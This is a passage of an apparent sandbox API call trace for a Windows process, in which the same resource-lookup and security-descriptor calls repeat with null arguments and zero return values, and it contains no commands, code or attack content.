lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.985] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.985] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.985] LockResource (hResData=0x0) returned 0x0 [0069.986] FreeResource (hResData=0x0) returned 0 [0069.986] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.986] LockResource (hResData=0x0) returned 0x0 [0069.986] FreeResource (hResData=0x0) returned 0 [0069.986] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.986] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.986] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.986] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.986] LockResource (hResData=0x0) returned 0x0 [0069.986] FreeResource (hResData=0x0) returned 0 [0069.986] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.986] LockResource (hResData=0x0) returned 0x0 [0069.986] FreeResource (hResData=0x0) returned 0 [0069.986] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.986] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.986] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.986] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.986] LockResource (hResData=0x0) returned 0x0 [0069.986] FreeResource (hResData=0x0) returned 0 [0069.986] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.986] LockResource (hResData=0x0) returned 0x0 [0069.986] FreeResource (hResData=0x0) returned 0 [0069.986] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.986] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.986] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.986] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.986] LockResource (hResData=0x0) returned 0x0 [0069.986] FreeResource (hResData=0x0) returned 0 [0069.986] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.986] LockResource (hResData=0x0) returned 0x0 [0069.986] FreeResource (hResData=0x0) returned 0 [0069.986] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.986] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.986] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.986] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.986] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.986] LockResource (hResData=0x0) returned 0x0 [0069.986] FreeResource (hResData=0x0) returned 0 [0069.987] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.987] LockResource (hResData=0x0) returned 0x0 [0069.987] FreeResource (hResData=0x0) returned 0 [0069.987] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.987] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.987] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.987] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.987] LockResource (hResData=0x0) returned 0x0 [0069.987] FreeResource (hResData=0x0) returned 0 [0069.987] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.987] LockResource (hResData=0x0) returned 0x0 [0069.987] FreeResource (hResData=0x0) returned 0 [0069.987] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.987] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.987] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.987] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.987] LockResource (hResData=0x0) returned 0x0 [0069.987] FreeResource (hResData=0x0) returned 0 [0069.987] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.987] LockResource (hResData=0x0) returned 0x0 [0069.987] FreeResource (hResData=0x0) returned 0 [0069.987] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.987] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.987] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.987] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.987] LockResource (hResData=0x0) returned 0x0 [0069.987] FreeResource (hResData=0x0) returned 0 [0069.987] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.987] LockResource (hResData=0x0) returned 0x0 [0069.987] FreeResource (hResData=0x0) returned 0 [0069.987] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.987] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.987] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.987] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.987] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.987] LockResource (hResData=0x0) returned 0x0 [0069.988] FreeResource (hResData=0x0) returned 0 [0069.988] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.988] LockResource (hResData=0x0) returned 0x0 [0069.988] FreeResource (hResData=0x0) returned 0 [0069.988] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.988] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.988] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.988] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.988] LockResource (hResData=0x0) returned 0x0 [0069.988] FreeResource (hResData=0x0) returned 0 [0069.988] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.988] LockResource (hResData=0x0) returned 0x0 [0069.988] FreeResource (hResData=0x0) returned 0 [0069.988] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.988] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.988] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.988] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.988] LockResource (hResData=0x0) returned 0x0 [0069.988] FreeResource (hResData=0x0) returned 0 [0069.988] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.988] LockResource (hResData=0x0) returned 0x0 [0069.988] FreeResource (hResData=0x0) returned 0 [0069.988] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.988] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.988] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.988] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.988] LockResource (hResData=0x0) returned 0x0 [0069.988] FreeResource (hResData=0x0) returned 0 [0069.988] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.988] LockResource (hResData=0x0) returned 0x0 [0069.988] FreeResource (hResData=0x0) returned 0 [0069.988] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.988] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.988] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.988] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.988] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.988] LockResource (hResData=0x0) returned 0x0 [0069.988] FreeResource (hResData=0x0) returned 0 [0069.989] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.989] LockResource (hResData=0x0) returned 0x0 [0069.989] FreeResource (hResData=0x0) returned 0 [0069.989] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.989] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.989] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.989] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.989] LockResource (hResData=0x0) returned 0x0 [0069.989] FreeResource (hResData=0x0) returned 0 [0069.989] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.989] LockResource (hResData=0x0) returned 0x0 [0069.989] FreeResource (hResData=0x0) returned 0 [0069.989] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.989] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.989] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.989] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.989] LockResource (hResData=0x0) returned 0x0 [0069.989] FreeResource (hResData=0x0) returned 0 [0069.989] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.989] LockResource (hResData=0x0) returned 0x0 [0069.989] FreeResource (hResData=0x0) returned 0 [0069.989] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.989] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.989] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.989] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.989] LockResource (hResData=0x0) returned 0x0 [0069.989] FreeResource (hResData=0x0) returned 0 [0069.989] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.989] LockResource (hResData=0x0) returned 0x0 [0069.989] FreeResource (hResData=0x0) returned 0 [0069.989] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.989] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.989] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.989] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.989] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.989] LockResource (hResData=0x0) returned 0x0 [0069.989] FreeResource (hResData=0x0) returned 0 [0069.990] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.990] LockResource (hResData=0x0) returned 0x0 [0069.990] FreeResource (hResData=0x0) returned 0 [0069.990] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.990] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.990] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.990] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.990] LockResource (hResData=0x0) returned 0x0 [0069.990] FreeResource (hResData=0x0) returned 0 [0069.990] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.990] LockResource (hResData=0x0) returned 0x0 [0069.990] FreeResource (hResData=0x0) returned 0 [0069.990] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.990] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.990] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.990] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.990] LockResource (hResData=0x0) returned 0x0 [0069.990] FreeResource (hResData=0x0) returned 0 [0069.990] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.990] LockResource (hResData=0x0) returned 0x0 [0069.990] FreeResource (hResData=0x0) returned 0 [0069.990] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.990] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.990] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.990] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.990] LockResource (hResData=0x0) returned 0x0 [0069.990] FreeResource (hResData=0x0) returned 0 [0069.990] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.990] LockResource (hResData=0x0) returned 0x0 [0069.990] FreeResource (hResData=0x0) returned 0 [0069.990] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.990] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.990] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.990] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.990] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.990] LockResource (hResData=0x0) returned 0x0 [0069.990] FreeResource (hResData=0x0) returned 0 [0069.990] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.991] LockResource (hResData=0x0) returned 0x0 [0069.991] FreeResource (hResData=0x0) returned 0 [0069.991] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.991] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.991] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.991] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.991] LockResource (hResData=0x0) returned 0x0 [0069.991] FreeResource (hResData=0x0) returned 0 [0069.991] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.991] LockResource (hResData=0x0) returned 0x0 [0069.991] FreeResource (hResData=0x0) returned 0 [0069.991] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.991] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.991] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.991] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.991] LockResource (hResData=0x0) returned 0x0 [0069.991] FreeResource (hResData=0x0) returned 0 [0069.991] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.991] LockResource (hResData=0x0) returned 0x0 [0069.991] FreeResource (hResData=0x0) returned 0 [0069.991] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.991] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.991] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.991] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.991] LockResource (hResData=0x0) returned 0x0 [0069.991] FreeResource (hResData=0x0) returned 0 [0069.991] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.991] LockResource (hResData=0x0) returned 0x0 [0069.991] FreeResource (hResData=0x0) returned 0 [0069.991] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.991] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.991] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.991] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.991] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.991] LockResource (hResData=0x0) returned 0x0 [0069.991] FreeResource (hResData=0x0) returned 0 [0069.991] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.992] LockResource (hResData=0x0) returned 0x0 [0069.992] FreeResource (hResData=0x0) returned 0 [0069.992] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.992] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.992] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.992] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.992] LockResource (hResData=0x0) returned 0x0 [0069.992] FreeResource (hResData=0x0) returned 0 [0069.992] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.992] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.992] LockResource (hResData=0x0) returned 0x0 [0069.992] FreeResource (hResData=0x0) returned 0 [0069.992] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.992] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.992] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.992] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 